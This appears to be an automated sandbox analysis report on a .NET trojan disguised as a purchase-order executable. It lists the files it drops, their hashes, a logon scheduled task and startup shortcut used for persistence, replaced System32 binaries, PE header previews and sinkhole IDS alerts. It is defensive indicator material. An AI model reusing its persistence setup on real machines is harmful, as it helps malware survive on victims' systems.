SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvfd5szs.lt0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zccguk4f.xmq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhpb4goo.y1g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp29D3.tmp

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1574
Entropy (8bit):	5.119325427481331
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaMxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTpv
MD5:	AC951B1982966F297E668C6516A963F8
SHA1:	180DAE72436F545D9C7466545FD28A6D2984E125
SHA-256:	E687256FF641EFAB24BD81204DBA991BD0B6B696503508CFA3C9EB37E16CB904
SHA-512:	205BF841879EF09214C63BAB5CE1E119980E8FB8E4A4B784E90EEFB8C6B094F48D809C7C9F8E101D47AD16416F1DDF2C2E0DEC045792386BAEB725AFEB1C9CA5
Malicious:	true
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\zeXKjViL.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1574
Entropy (8bit):	5.119325427481331
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaMxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTpv
MD5:	AC951B1982966F297E668C6516A963F8
SHA1:	180DAE72436F545D9C7466545FD28A6D2984E125
SHA-256:	E687256FF641EFAB24BD81204DBA991BD0B6B696503508CFA3C9EB37E16CB904
SHA-512:	205BF841879EF09214C63BAB5CE1E119980E8FB8E4A4B784E90EEFB8C6B094F48D809C7C9F8E101D47AD16416F1DDF2C2E0DEC045792386BAEB725AFEB1C9CA5
Malicious:	true
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	665670656
Entropy (8bit):	7.9999993515437415
Encrypted:	true
SSDEEP:
MD5:	B4B82042C00E471AC2399BADB63F1C10
SHA1:	CEEE064C841E11897E2EC0C1D013CC5465B32A16
SHA-256:	7C6B6B9502BF766DD63F0E51191FDA8A9016419A1A7A870081A8304EF1D573F8
SHA-512:	99E9116807A9B3574A1D90DF02202C46ADD06D821A710D1F28E72EA03434A1A38812ADFE6156DF28C2A484AC51CD5E4489A7F19B5D44D806EC1559AB16B56D6B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
Category:	dropped
Size (bytes):	1814
Entropy (8bit):	2.4077982732154424
Encrypted:	false
SSDEEP:	12:8rsXowAOcQ/tz0/CSL4WWeMNDyWlT9gRKQ17+AUvO4Zv7L1Q17+ANTCNfBT/v4tK:8ILDWLqeMNmG9g9R+O4ZvPqRgpdqy
MD5:	0AA0FF9E058C3DE507C59168AE9CFD3D
SHA1:	CB8097303EAB96960C2B79ACDD235D24B48149F4
SHA-256:	5AA15DE045A571F79B2F70D1A91AAA79BD09E62508814B664DAAAE58201C8BEC
SHA-512:	CB7A0659691835C412D17E49630CC2077BC8660DB2C93E393A1660C35ABF18E1B34FC24B7434EAB303B13634E6675DCC169F1112A5A4030B2AF6066DE5726762
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@......................................................1....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.3.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.....................................................................................................................

C:\Users\user\AppData\Roaming\a5f0bea56967b89b.bin

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.983502184449185
Encrypted:	false
SSDEEP:	192:L3uzqKEwnD/9OCBzSdaHXCtw35OnXPs23deGDAjVLPvQKVa070wYLdLssOV:LjKE09O9U3i0cs2NTKLPvQKVa070wS0
MD5:	595E5314136DC3E7295955EF0469E1C5
SHA1:	A6A60EAC0C147EF7A51793C350F082F0540145D4
SHA-256:	B5F050F36595C91271070095CA06D6A40A56CED7B935CAF7C42B8EAAD06A905F
SHA-512:	436A25AFCE0AD2CB5C7712DA01E4ACD028253016540D5BDFDBEE3A7D2618C29194AB2F54D5FCF40883B9D7448599154745E85DAA227540B3AEFF4909F3D0DE0D
Malicious:	true
Reputation:	unknown
Preview:	...K..=1o.._....Ey.2......gh[N~J.SY.uD...~..\|+-.....w.....m.N.j[9.....N".o..s..!x.1}Q..=.$....+.?v[....l{.Y.nr0...t.....6<.n..z....0L......k.I......!.....F....a.J...k@......u.H.7..p..5$.9.W9.B.La6...U........"l7i...)......x...f.>..!..w`M].f[........d..m..\.kp.f......].-s...J........o^.%.Y..k]....hG......m.@d.4....=..dM-...k-.....Yp..T..Q......`H..e+3...E..:.n.<J(j'......,%@ofHR{..z....vw?.N...Wb.FP...0....=^.`.[_..9..\..$D.u1_.t=....%.D.K.sx.<.o^.{-...A......{.h?..Q..p..i..SV..>...z.6U"...uB..;.).3F#..(?....0y...4..N.=....zM..'..8X...c\|....{.^.X...m<.]..=.L......._.P.c=...~r............+7..,.._..I.^......r\?...hx....k..;.Q....g..:..QV<..8z..T.kT..Q........j..9.../rU..)".Ey...R..^.%i......G..^o.WI.........}.........:.3cM.p.-..P.....Y\|NT.r...8.L.o(...h.X.JRQU......1.}.'8.+A.S.R.u....x..n....O..'j...k...i..T....&L.P.r.g.f.y..tpQ...Km^.......D../.A?...R...T.....u.b..x>z.LD...b..d._.C......d..<....2.;.w.7j.z.....GMj.:..g%.B.L.....-k[n.6

C:\Users\user\AppData\Roaming\zeXKjViL.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1442304
Entropy (8bit):	7.980248681174446
Encrypted:	false
SSDEEP:	24576:K5h0WNJ6H+ZIxFu1Zv4bteRJ9or8SM9UuoPzKn6St0KPLbQebMxQqjts19g:WrK+Zkbt6J9ooSxuow6aJMepQODg
MD5:	C12317B003EBC503C85BAB87C2104120
SHA1:	71C988096FFBE3E4B6D9976FEE29427C9BDBF23F
SHA-256:	5454862EE4069DF3D2058763AB8D8E01ABB4114E628F32305817F31F0AD1FE83
SHA-512:	4123659F72EC605015E9210F456C6BB22DFBCF032756649323124834D45009405B02662FC778403C696FEB2DBA7ADA7562A77C068645AA1D8B5B952452D079C1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg.....................4........... ........@.. .......................`............`.................................l...O........2...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....2.......2..................@..@.reloc.......@......................@..B........................H.......@...,?......K....................................................0..A....... .........%.....(......... 0........%.A...(.....B...(l........&....0..m........s_...}........{......}4.......{......u....}5.....}.....(.....(.....{....{5.... ..7!..........(L... {..7!..........(L...~....%-.&~..........s....%.....(...+(...+~....%-.&~..........s....%.....(...+.......%..t....(...+s.....%. `..7!..........(L....%. _..7!..........(L..........(.... U..7!..........(L... ...........

C:\Users\user\AppData\Roaming\zeXKjViL.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.253782258251028
Encrypted:	false
SSDEEP:	24576:bQW4qoNUgslKNX0Ip0MgHCpoMBOuLsqjnhMgeiCl7G0nehbGZpbD:bQW9BKNX0IPgiKMBOu/Dmg27RnWGj
MD5:	1B7D1BBDA98AC1FED8DBC0B99926E47C
SHA1:	71E74E2D3FFC2EE730490A25E7EA95C4B893F67A
SHA-256:	E5502217685B9236926BF9E697BDEA149F0A20103E3AD373E72891DD792B6079
SHA-512:	23511DB3BEC5BEF16E9BED0CC955E2C97DA03ECE2A04909A59B19687E97C4FB31363CB6299C5654F08616EEC0C221BBD28E1197A0355A5DB4E7F4263219AA3DE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1224192
Entropy (8bit):	5.163564930443691
Encrypted:	false
SSDEEP:	24576:H2G7AbHjkUsqjnhMgeiCl7G0nehbGZpbD:H2G7AbHjpDmg27RnWGj
MD5:	3315FC504BE337D6BBF6B1267C85845B
SHA1:	8000C566A8DD512B3B400C4654292C51ADB6F76B
SHA-256:	B08B273C46F13D511B380DD9C7F5B3A1790311FC6DF3FA2DD4D56FC1B0D3BD50
SHA-512:	E0007C417B5AA760E26E34841DB057C6BA2B5B049158746B993C3330FC1001194C43F073A9CD367539F1845E30AE77CCF423921948EC3EB53EC9740D8EC3170A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................>.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\FXSSVC.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.28897072771141
Encrypted:	false
SSDEEP:	24576:HkdpSI+K3S/GWei+qNv2uG3MsqjnhMgeiCl7G0nehbGZpbD:H6SIGGWei2uG34Dmg27RnWGj
MD5:	AC7FF2F8D7B75603AD58755D5762D640
SHA1:	E3695470D1C09329DB4B484C30FFD16F00712939
SHA-256:	646B61FBE87FD7560FB802EADF0E076156A1DF92FA18AB1318B0BE7473DC5734
SHA-512:	80C1ED0597763839F756AB1F9D572E5E7E0FBA881B252874F265485CF46517D1854E69E97342C362E79004D30519CC6C91C1A947F5E9A706A703C4F3E780D86B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...\|..}x...y..}x..}y.x\|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......i..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1225728
Entropy (8bit):	5.163318864669806
Encrypted:	false
SSDEEP:	12288:yEP3R69Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:x69sqjnhMgeiCl7G0nehbGZpbD
MD5:	73A5E8C4C9FBA1AD14C07468F41BFB78
SHA1:	6B9FF1F0F477BD462FE191C6AEFAB9F1ACE4A6D8
SHA-256:	FF40D2401E7D53BC70F1A0F036B4EED6DDE91B9A3D34188333BBDDEC7CFE029E
SHA-512:	CB6B0A4BFB23B4BB6B1F8AE93CC81A1F8FB98CEF59F85F9A1046FD1ECE17AA72C4C61B9CF87F989CF059C5B6D3AE63F78F3BEBB07038FF8E3AD450C9EEC5BC9B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Roaming\a5f0bea56967b89b.bin

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.984333322955903
Encrypted:	false
SSDEEP:	384:zjqzoRHcaP3uXpDybiDXRA5W3D6Kp+MaeT9aQyAh+:zGsVcE3OpDymTRA5dKp+MjT9aUA
MD5:	BA2D0DF3DF692126FAE7D7D20B42E28C
SHA1:	620B0C217EE1F7B771D174B193F100ED64CDDD5C
SHA-256:	43594815812C26EB284EEB36EC04F2705857FAEC000F3EEEA9A66CE3F47AE33A
SHA-512:	71CFCCDEDDE5CE5974C92EBDDBD89D58D78A34DE1BE4A1CD7F4C06D5C8D5CB244DE78F245F41E6EF406A9EB3D2C3C10DE50EC48C2E8450D1354AF235834C7C0D
Malicious:	true
Reputation:	unknown
Preview:	8CZ ....]<..b....BQca..g.+&.w.#....Wv\.....E.......,U..&o...%.0j.......1.O.w...... y.v.+.,c.?.y.I.e...>......f.vP>......>n3..tv.wP.....rT....i...f.....t..d=........L.j.pD...B..c....;5cM .;>_.$D....}c.nc<.Jw>.r..NJ.i..{E..v.......q.T !s54..............>.+.G... `...\?9.........4....;.......m.;...P..].V.6.B;_.C.Xr.......>....&...P....O.t\F8...t{....../.kMX.=D.......E".rq..~.r....P.VI...-...$4L.8.rW....Pd.V.....{..e..7.....e*.V...5........K...e...'.@\|2....I...3.....T....g/[4H.iy......2QJ.......8..X#?....Q.C.x.#?.9...'...2..B.../,Enn\.....XT.&.$...?.[rJ.U..k..........E}..E.:.\...L)B....~..R:..eX>.IMmn.'5..YYy)=.V..............&......qfwj....R..Q..1.4SR....UJf2.....Y..!....A.!.j1...._....i5.........T/..Q.\|..tg.>..B{p{.nv.m...b#.v.j4..K.(...........-..0.......L..:lf...c...A...Y"K'.9.cj...I......I..<w..bY+..E".. ....H...F;...b..!..'n..,.....$'?f.>.}.....~.-t...v.,...0.x.m.c..H.u2rt..~:...s9.....-o .......j...{jzr3.'n$/...qE&..5....:...qI.z{:.!..&.<i

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.980248681174446
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	PO_2024_056209_MQ04865_ENQ_1045.exe
File size:	1'442'304 bytes
MD5:	c12317b003ebc503c85bab87c2104120
SHA1:	71c988096ffbe3e4b6d9976fee29427c9bdbf23f
SHA256:	5454862ee4069df3d2058763ab8d8e01abb4114e628f32305817f31f0ad1fe83
SHA512:	4123659f72ec605015e9210f456c6bb22dfbcf032756649323124834d45009405b02662fc778403c696feb2dba7ada7562a77c068645aa1d8b5b952452d079c1
SSDEEP:	24576:K5h0WNJ6H+ZIxFu1Zv4bteRJ9or8SM9UuoPzKn6St0KPLbQebMxQqjts19g:WrK+Zkbt6J9ooSxuow6aJMepQODg
TLSH:	556533CDECA7A111CA8C6F7AC863085441F09767F062F20908A69D799F99BE447EFD13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg.....................4........... ........@.. .......................`............`................................

File Icon


Icon Hash:	16bb2d4d6ccc6593

Static PE Info

General

Entrypoint:	0x55ebbe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6772CEF8 [Mon Dec 30 16:48:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15eb6c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x160000	0x3200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x164000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x15cbc4	0x15cc00	2bde33f7981469f355e134a75c92f90a	False	0.9793892809139785	data	7.982441629282343	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x160000	0x3200	0x3200	9726b8590865a2701a5707ef223a5685	False	0.941953125	data	7.778335987550486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x164000	0xc	0x200	796c0a2753d9492fd1df3b70d1909b60	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1600c8	0x2d81	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9937333676710447
RT_GROUP_ICON	0x162e5c	0x14	data	1.05
RT_VERSION	0x162e80	0x30c	data	0.43333333333333335

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T09:05:07.955302+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.4	49739	TCP
2024-12-31T09:05:07.955302+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.4	49739	TCP
